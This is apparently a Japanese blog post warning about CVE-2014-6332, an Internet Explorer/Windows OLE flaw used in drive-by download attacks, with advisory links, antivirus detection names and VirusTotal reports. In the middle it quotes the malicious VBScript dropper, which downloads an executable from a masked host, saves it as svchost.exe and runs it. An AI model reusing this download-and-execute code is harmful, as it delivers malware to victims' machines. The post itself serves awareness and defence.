ノートパソコン dynabook が 
5万円台から♪CVE-2014-6332脆弱性 サイト閲覧でウイルス強制感染ドライブバイ・ダウンロード攻撃
{{{ 2014年11月更新 }}}
ナンと18年ほど気づかれぬまま放置されてた形だった脆弱性だそう。 
影響環境 Windows 95、Windows 98、Windows ME、Windows XP、(Windows Vista)、(Windows 7)、(Windows 8)
影響ブラウザ Internet Explorer 3 ~ 11
これは激しくヤバイよヤバイよ~(出川風)。
● Windows OLE の脆弱性により、リモートでコードが実行される (3011443) マイクロソフト セキュリティ情報 MS14-064 - 緊急
https://technet.microsoft.com/ja-jp/library/security/ms14-064.aspx
https://technet.microsoft.com/ja-jp/library/security/ms14-064.aspx
● A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332 (Trend Micro)
http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
● 徹底検証:深刻な脆弱性「CVE-2014-6332」、簡単に利用される恐れ (トレンドマイクロ)
http://blog.trendmicro.co.jp/archives/10346
http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
● 徹底検証:深刻な脆弱性「CVE-2014-6332」、簡単に利用される恐れ (トレンドマイクロ)
http://blog.trendmicro.co.jp/archives/10346
BitDefender Exploit.CVE-2014-6332.Gen
DrWeb Exploit.CVE-2014-6332.1
ESET-NOD32 Win32/Exploit.CVE-2014-6332.A
Kaspersky Exploit.VBS.CVE-2014-6332.a
McAfee Exploit-CVE2014-6332
Microsoft Exploit:VBS/CVE-2014-6332
Symantec Exp.CVE-2014-6332
すでにこの穴は塞がれてる Windows Vista/7/8 は他の脆弱性(Adobe Flash Playerなど)経由で攻略できるチャンスが巡ってくるぐらいだけど…
2014年4月にマイクロソフトのサポートが終了してる Windows XP となるともうガバガバ状態であり、強制インストールされるであろうネットバンキングウイルスや身代金要求ウイルス(ランサムウェア)の餌食へ一直線!
読み込まれるVBScriptコード
脆弱性を突く攻撃が成立すると、外部ネットワークから実行ファイルをダウンロードしてきて起動するようになってる不正なVBScriptコードをメモリ上で読み込まされますかい。
function runmumaa()
On Error Resume Next
Set objWsh = CreateObject("Wscript。Shell")
objWsh.run "cmd。exe /c echo >>C:\Windows\Temp\text.vbs Set xPost=createObject(""Microsoft。XMLHTTP"") & echo >>C:\Windows\Temp\text.vbs xPost.Open ""GET"",""http://XXXXXX/****.exe"",0 & echo >>C:\Windows\Temp\text.vbs xPost.Send() & echo >>C:\Windows\Temp\text.vbs set sGet=createObject(""ADODB。Stream"") & echo >>C:\Windows\Temp\text.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\text.vbs sGet.Type=1 & echo >>C:\Windows\Temp\text.vbs sGet.Open() & echo >>C:\Windows\Temp\text.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\text.vbs sGet.SaveToFile ""C:\Windows\Temp\svchost.exe"",2",0
objWsh.run "cscript.exe C:\Windows\Temp\text.vbs",0,true
wscript.sleep 10000
objWsh.run "C:\Windows\Temp\svchost.exe"
document.write(Err.Description)
end function
・
日本関連サイト改ざん被害例
□
> www.virustotal.com/ja/file/0ca585b0a3315a164b850863bf1ecd71b084ba27edff3b6b6aadb605c35c56d3/analysis/1416065463/
> /?report=d8a51083133d1b03de011cf652c4a39d6fe02bfc
> /?report=d8a51083133d1b03de011cf652c4a39d6fe02bfc
■
>www.virustotal.com/ja/file/b7aeb3ae47d0616ec1d20f35a53eefb12ba39e1aa0018e5447a8f72b937a19ba/analysis/1416643880/
> /?report=b551c9792d87afbe0944fd2dae92d987d062a446
> www.virustotal.com/ja/file/8dfc5cab5935748e76f0fda57948cdb59b1fd3962a248391737429ecaf497487/analysis/1416509885/
> /?report=cbbfe1a2befa52fa496af815e3221d0a08fbe297
> /?report=b551c9792d87afbe0944fd2dae92d987d062a446
> www.virustotal.com/ja/file/8dfc5cab5935748e76f0fda57948cdb59b1fd3962a248391737429ecaf497487/analysis/1416509885/
> /?report=cbbfe1a2befa52fa496af815e3221d0a08fbe297
■
> /?report=554a85f04e0b337d7e42454d886d548faf4daede
> /?report=317cba88cac0e3dc95bf5800cc03254df282d2d5
> /?report=317cba88cac0e3dc95bf5800cc03254df282d2d5
■
> ?report=22593318fbb21d5845815ed13a9d092daed7b3b4
コメント